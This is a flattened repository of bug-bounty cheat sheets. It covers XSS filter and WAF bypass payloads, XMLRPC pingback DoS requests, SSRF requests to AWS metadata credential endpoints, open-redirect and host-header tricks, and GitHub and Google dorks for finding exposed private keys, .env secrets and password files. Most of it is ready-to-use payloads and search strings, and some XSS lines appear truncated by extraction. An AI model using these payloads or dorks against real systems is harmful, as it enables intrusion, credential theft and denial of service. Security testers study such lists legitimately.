├── Application_Level_DoS └── Application_Level_DoS.txt ├── Credit Card Fraud └── Credit Card Fraud.txt ├── Cross Site Scripting ├── Bypass └── Cross SIte Scripting.txt ├── Host Header Injection └── Host Header Injection.txt ├── LICENSE ├── Open Redirect ├── Bypass └── Open Redirect.txt ├── README.md ├── Recon ├── GitHub Dorks.txt └── Google Dorks.txt └── Server Side Request Forgery ├── SSRF Roadmap.jpg └── SSRF.txt /Application_Level_DoS/Application_Level_DoS.txt: -------------------------------------------------------------------------------- 1 | ##BugBountyTips ##Application_Level_DoS 2 | 3 | Author : @NovanAR 4 | 5 | 1. Long String DoS 6 | -Try to input long password when registering an account 7 | -Try to input long text in Address, Name, Username, etc. 8 | 9 | 2. Picture Name Parameter 10 | -Upload a picture with large value name parameter 11 | -Upload a picture with the DoS payload inside it 12 | -Insert a DoS payload on image's "size" parameter 13 | 14 | 3. Pixel Flood Attack 15 | -Try to upload a picture with large resolution image 16 | 17 | 4. Application Level DoS via XMLRPC 18 | 1. Find some wordpress website with XMLRPC enabled and call the systems.listMethods 19 | 20 | POST /xmlrpc.php HTTP/1.1 21 | Host: vulnerable-website.com 22 | Accept: / 23 | Accept-Language: en 24 | Connection: close 25 | Content-Length: 93 26 | 27 | 28 | system.listMethods 29 | 30 | 31 | 32 | 2. Use the "pingback" methods to cause a DDOS attack against victim host 33 | 34 | POST /xmlrpc.php HTTP/1.1 35 | Host: vulnerable-website.com 36 | Accept: / 37 | Accept-Language: en 38 | Connection: close 39 | Content-Length: 93 40 | 41 | 42 | 43 | pingback.ping 44 | 45 | http://yourip:port 46 | 47 | 48 | https://target.com> 49 | 50 | 51 | -------------------------------------------------------------------------------- /Credit Card Fraud/Credit Card Fraud.txt: -------------------------------------------------------------------------------- 1 | ##BugBountyTips ##Credit_Card_Fraud 2 | 3 | Author : @NovanAR 4 | GitHub : https://github.com/novanazizr 5 | 6 | Found a target with an e-commerce checkout? 7 | 8 | Try this test credit card number "4242 4242 4242 4242" Use any CVV and Credit Card Date 9 | 10 | If the payment was succeeded go report it. 11 | 12 | The impact was Business loss, any user can checkout a product using a test credit card number 13 | 14 | For more information check in here : https://stripe.com/docs/testing 15 | -------------------------------------------------------------------------------- /Cross Site Scripting/Bypass: -------------------------------------------------------------------------------- 1 | site.com/randomsearch/?input=test reflected 2 | site.com/randomsearch/?input=test" reflected 3 | site.com/randomsearch/?input=test">< reflected 4 | site.com/randomsearch/?input=test"

403 blocked 5 | site.com/randomsearch/?input=test" 403 blocked 6 | site.com/randomsearch/?input=test"<1> reflected 7 | site.com/randomsearch/?input=test"<%20h1> reflected "

8 | site.com/randomsearch/?input=test< s v g / on lo ad = con firm ( 1 )> ( popup ) 9 | <> 10 | site.com/randomsearch/?input=test reflected 11 | site.com/randomsearch/?input=test" 403 blocked 12 | site.com/randomsearch/?input=test> 403 13 | site.com/randomsearch/? 14 | via #post_data 15 | input=test" reflected 16 | site.com/randomsearch/? 17 | via #post_data 18 | ?input=test ( popup ) 19 | <> 20 | site.com/randomsearch/?input=test 403 21 | site.com/randomsearch/?input= 403 22 | site.com/randomsearch/ 403 23 | site.com/aandomsearch/ 404 24 | site.com/%72andomsearch/ 403 25 | Hello 403 26 | site.com/%25%37%32andomsearch/ 200 27 | site.com/%25%37%32andomsearch/?input=test reflected 28 | site.com/%25%37%32andomsearch/?input=test" 403 29 | site.com/%25%37%32andomsearch/? 30 | via #post_data 31 | ?input=test ( popup ) 32 | 33 | * KNOXSS XSS Vectors Series * 34 | 35 | #XSS Vector #2 36 | 37 | 1" ´} 43 | Input : "/**/ONX=""/**/ONFOCUS=prompt()> 44 | Respond : Blocked 🙁 45 | Input : "%01onfocus=test> 46 | Respond : blocked 🙁 47 | Input : "%2501onfocus=> 48 | Respond : blocked 🙁 49 | Input : "test=[1].map(confirm)> 50 | Respond : blocked 🙁 51 | Input : "test=[1].map%26%2300000000000040;1)> 52 | Respond : Blocked 🙁 53 | Solutions : 54 | Input : "onx=() onmouseover=prompt(1)> 55 | Respond : pop up appears 😃 56 | Input : " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)> 57 | Respond : pop up appears 😃 58 | Input : "onx={} onmouseover=prompt(1)> 59 | Respons : pop up appears 😃 60 | Input : "onx=[] onmouseover=prompt(1)> 61 | Respond : pop up appears 😃 62 | 63 | Dom XSS bypass WAF Cloudflare 64 | " onfocus=0;[1].some(confirm) haha=" 65 | 66 | Simple technique XSS REFLECTED Bypass Waf ACCES DENIED & REQUEST REJECTED 67 | 68 | Input : "onclick=> 69 | Respond : blocked waf :( 70 | 71 | Input : ">
72 | Respond : blocked waf :( 73 | 74 | Input = "autofocus /*/onXXXXX=""/*/ONFOCUS= 75 | Respond : blocked waf :( 76 | 77 | Input : prompt() 78 | Respond : blocked waf :( 79 | 80 | Input : [1].find(alert) 81 | Respond : blocked waf :( 82 | 83 | Input : constructor.constructor('alert()')() 84 | Respond : blocked waf :( 85 | 86 | Solutions : 87 | 88 | Input : "autofocus %2501onfocus=> 89 | Respond : not blocked waf :D 90 | 91 | Input :
92 | Respond : not blocked waf :D 93 | 94 | Input : [1].map(alert) 95 | Respond : not blocked waf :D 96 | 97 | Final : 98 | Input :
99 | Respond : Pop Up appears :D 100 | 101 | Input : "autofocus %2501onfocus=[1].map(confirm)> 102 | Respond : Pop Up appears :D 103 | 104 | Solution XSS BYPASS REMOVED TAG & FILTER TAG HTML ENTITIES WITH NOSCRIPT TAG 105 | 106 | Input :
107 | Respond : 108 | 109 | Input : 110 | Respond : <svg onload=prompt()> 111 | 112 | Input :
113 | Respond :
114 | 115 | No pop up appears :( 116 | 117 | Solution : 118 | 119 | Input :

120 | Respond :

121 | 122 | Pop up appears :D 123 | 124 | Our 1st-choice #XSS vector reflects: 125 | 126 | onmouseover="hack() 139 | 140 | Reflection: 141 | .txt 64 | 65 | 66 | XSS Firewall Bypass Techniques 67 | 68 | Check if the firewall is blocking only lowercase 69 | 70 | 71 | 72 | Try to break firewall regex with the new line(\r\n) 73 | 74 | 75 | 76 | Try Double Encoding 77 | 78 | %2522 79 | 80 | Testing for recursive filters, if firewall removes text in red, we will have clear payload 81 | 82 | ipt>alert(1);ipt> 83 | 84 | Injecting anchor tag without whitespaces 85 | 86 | 87 | 88 | Try to bypass whitespaces using Bullet 89 | 90 | 91 | 92 | Try to change request method 93 | 94 | GET /?q=xss POST/?q=xss 95 | 96 | Try XSS polyglot 97 | %0ajavascript:`/*\"/*--><svg onload='/*
6 |
7 | -------------------------------------------------------------------------------- /Recon/GitHub Dorks.txt: -------------------------------------------------------------------------------- 1 | filename:manifest.xml 2 | filename:travis.yml 3 | filename:vim_settings.xml 4 | filename:database 5 | filename:prod.exs NOT prod.secret.exs 6 | filename:prod.secret.exs 7 | filename:.npmrc _auth 8 | filename:.dockercfg auth 9 | filename:WebServers.xml 10 | filename:.bash_history 11 | filename:sftp-config.json 12 | filename:sftp.json path:.vscode 13 | filename:secrets.yml password 14 | filename:.esmtprc password 15 | filename:passwd path:etc 16 | filename:dbeaver-data-sources.xml 17 | path:sites databases password 18 | filename:config.php dbpasswd 19 | filename:prod.secret.exs 20 | filename:configuration.php JConfig password 21 | filename:.sh_history 22 | shodan_api_key language:python 23 | filename:shadow path:etc 24 | JEKYLL_GITHUB_TOKEN 25 | filename:proftpdpasswd 26 | filename:.pgpass 27 | filename:idea14.key 28 | filename:hub oauth_token 29 | HEROKU_API_KEY language:json 30 | HEROKU_API_KEY language:shell 31 | SF_USERNAME salesforce 32 | filename:.bash_profile aws 33 | extension:json api.forecast.io 34 | filename:.env MAIL_HOST=smtp.gmail.com 35 | filename:wp-config.php 36 | extension:sql mysql dump 37 | filename:credentials aws_access_key_id 38 | filename:id_rsa or filename:id_dsa 39 | 40 | GitHub Dorks for Finding Languages 41 | 42 | language:python username 43 | language:php username 44 | language:sql username 45 | language:html password 46 | language:perl password 47 | language:shell username 48 | language:java api 49 | HOMEBREW_GITHUB_API_TOKEN language:shell 50 | 51 | GiHub Dorks for Finding API Keys, Tokens and Passwords 52 | 53 | api_key 54 | “api keys” 55 | authorization_bearer: 56 | oauth 57 | auth 58 | authentication 59 | client_secret 60 | api_token: 61 | “api token” 62 | client_id 63 | password 64 | user_password 65 | user_pass 66 | passcode 67 | client_secret 68 | secret 69 | password hash 70 | OTP 71 | user auth 72 | 73 | -------------------------------------------------------------------------------- /Recon/Google Dorks.txt: -------------------------------------------------------------------------------- 1 | "-----BEGIN EC PRIVATE KEY-----" | " -----BEGIN EC PARAMETERS-----" ext:pem | ext:key | ext:txt 2 | inurl:example.com intitle:"index of" 3 | inurl:example.com intitle:"index of /" "*key.pem" 4 | inurl:example.com ext:log 5 | inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 6 | inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 7 | inurl:example.com intitle:"index of" "config.db" 8 | inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml 9 | inurl:example.com intext:admin ext:sql inurl:admin 10 | inurl:example.com allintext:username,password filetype:log 11 | site:example.com "-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa 12 | DB_USERNAME filetype:env 13 | DB_PASSWORD filetype:enc=v 14 | filetype:txt site:web.com password|passwords|contraseñas|login|contraseña 15 | filetype:sql “MySQL dump” (pass|password|passwd|pwd) 16 | site:gov filetype:pdf allintitle:restricted 17 | allintext:password filetype:log after:2020 18 | intitle:"index of" inurl:ftp 19 | intitle:"index of" inurl:http after:2020 20 | filetype:xls inurl:"email.xls" 21 | intitle:index.of id_rsa -id_rsa.pub 22 | filetype:log username putty -------------------------------------------------------------------------------- /Server Side Request Forgery/SSRF Roadmap.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novanazizr/BugBountyHunting/24144fada114ff0cb116b8387059a460ed30e68b/Server Side Request Forgery/SSRF Roadmap.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/SSRF.txt: -------------------------------------------------------------------------------- 1 | ##BugBountyTips ##ServerSideRequestForgery 2 | 3 | Author : @NovanAR 4 | GitHub : https://github.com/novanazizr 5 | 6 | 7 | ##Full Description About SSRF 8 | 9 | https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF 10 | 11 | ##How To Find SSRF? 12 | 13 | 1. If you got Open Redirect try escalating it to SSRF. 14 | 2. gf SSRF to grep parameters may vulnerable to SSRF. 15 | 3. SSRF's are more in API's so crawl the whole web app with burp proxy turned on and search for keywords like., eg : 16 | 17 | ?url= 18 | ?uri= 19 | ?req= 20 | 21 | 4. Sign up with an Email like attacker.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there's no impact don't report it, DNS and SMTP request doesn't matters. 22 | 23 | 24 | ##AWS Metadata 25 | 26 | 1. AWS localhost is 169.254.169.254 so don't use 127.0.0.1 there! 27 | 2. If you found an SSRF vulnerability that runs on EC2, try requesting : 28 | 29 | http://169.254.169.254/latest/meta-data/ 30 | http://169.254.169.254/latest/user-data/ 31 | http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE 32 | http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ 33 | 34 | Source : https://twitter.com/ADITYASHENDE17/status/1305051512335298562 35 | 36 | ##Escalation 37 | 38 | 1. Try to escalate it to RCE using AWS Metadata 39 | 40 | Source : https://hackerone.com/reports/341876 41 | 42 | 2. Try to escalate it to OS Command Injection using collaborator 43 | 44 | .collaborator.net 45 | 46 | Source : https://www.youtube.com/watch?v=apzJiaQ6a3k 47 | 48 | 3. Try to escalate it to XSS using SVG image 49 | 50 | Source : https://hackerone.com/reports/223203 51 | 52 | 53 | ##Blind SSRF Tips 54 | 55 | 1. Try to find Blind SSRF on hidden parameter 56 | 2. Try Blind SSRF on referer header 57 | 58 | One way of finding them is by inserting your burp collaborator domain into the referrer header also known as host header injection. 59 | 60 | Snippet: 61 | 62 | GET /HTTP 1.1 63 | Host: site.com 64 | User Agent: Firefox 65 | Referrer: https://your_collaborator_instance.com 66 | 67 | ##SSRF Bypass 68 | 69 | 1. http://[0:0:0:0:0:ffff:127.0.0.1]/(the file) 70 | 71 | Source : https://hackerone.com/reports/736867 72 | 73 | 2. Using %E3%80%82 (。) Url Encode 74 | 75 | Source : https://twitter.com/h4x0r_dz/status/1335880542353559552 --------------------------------------------------------------------------------